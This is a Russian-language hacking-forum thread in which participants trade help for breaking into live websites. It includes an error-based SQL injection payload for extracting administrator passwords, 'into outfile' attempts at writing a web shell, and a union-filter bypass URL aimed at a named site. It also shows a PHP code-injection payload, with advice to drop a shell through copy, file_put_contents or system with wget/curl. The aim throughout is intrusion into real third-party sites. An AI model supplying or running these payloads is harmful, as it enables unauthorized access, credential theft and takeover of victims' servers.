Если я все правильно понял то: 1) конструкция такова к примеру в cms_administrator хранятся пассы password '+or+1+group%20by%20concat((select%20concat(0x3a,password,0x3a)%20from%20cms_administrator%20limit%200,1),floor(rand(0)*2))%20having%20min(0)%20or%201=' если это error based 2) если работаешь в havij то значения он выведет если нажать кнопку Get Data 3)вопрос, а с чего ты взял что шелл залить некуда? file_priv и m.q значения какие?
уважаемые знатоки знатоки прошу помощи!! ресурс почти сломлен ситуация такова: file_priv Y m.q. off load работает чтение на ура. +and+'select+'+into+outfile+'+!=1' ответ Invalid query: File ' !=1' already exists и дело не в том что я не могу перевести. С переводом проблем нет. Просто я знаю что там такого файла нет. Если кто не разобрался - задача заливка Shell-а. Не выходит через админку скрипты не работают ограничение по ip идет. По определенным причинам не могу выложить в паблик если у кого было подобное отзовитесь
Да есть Есть все но в итоге нет ничего... даже прочитан config.ini где логин и пасс от бд. но сама бд где то спрятана. есть логины и пароли от админки зайти захожу но не могу там ничего нельзя сделать скрипты не работают. Только и остается кричать на помощь!
Уважаемые, подскажите, был сайт уязвим по параметру product.php?id= буквально только что, все товары поменяли на html , а при входу на старый параметр сразу редирект. 7де еще можно покапать уязвимость ???
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
http://www.martinzaple.co.uk/gallery.php?id=-7+/*!union*/+select+1,(select+schema_name+from+information_schema.schemata),3,4,5,6,7--+ there "union" filter
Народ такой вопрос. Есть скуля msql 4.0.24-standart. Не выводит никак database(). делаю concat_ws(0x3a,user(),database(),version()) - вся информация есть кроме имени базы. Такое впечатление что для данного user() не в одну базу нет доступа? Линку скинуть пока не могу но хотелось бы разобраться почему такое получается? Может посоветуете чего? Заранее спасибо.
нашел php injection запрос вот такой http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publications&_t=rec&id=1403 в ответ получаю 67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists! Кто подскажет каким методом раскрутить?
да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй. а в след раз открой учебник по php, прежде чем задавать элементарные вопросы
